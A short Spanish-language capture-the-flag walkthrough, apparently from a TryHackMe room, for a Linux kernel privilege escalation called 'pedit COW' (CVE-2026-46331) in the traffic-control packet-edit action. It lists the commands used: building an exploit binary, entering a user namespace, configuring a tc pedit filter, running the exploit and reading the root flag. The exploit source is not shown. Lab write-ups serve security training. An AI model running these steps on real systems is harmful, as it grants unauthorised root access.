
Informe y pasos de explotación para la vulnerabilidad pedit COW (CVE-2026-46331)
Informe y pasos de explotación para la vulnerabilidad pedit COW (CVE-2026-46331).
Este desafío demuestra pedit COW, una falla del kernel de Linux en la acción de edición de paquetes del subsistema de control de tráfico (act_pedit). La vulnerabilidad permite a un usuario no privilegiado sobrescribir una copia en memoria de un binario setuid-root, obteniendo efectivamente una shell root sin tocar jamás el archivo en el disco.
El entorno comienza como un usuario no privilegiado (karen).
id
cd ~/packet_edit_meme
make packet_edit_meme
unshare -r -n
tc qdisc del dev lo clsact
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
exit
./packet_edit_meme
# cat /root/flag.txt
THM{YOUR_FLAG_HERE}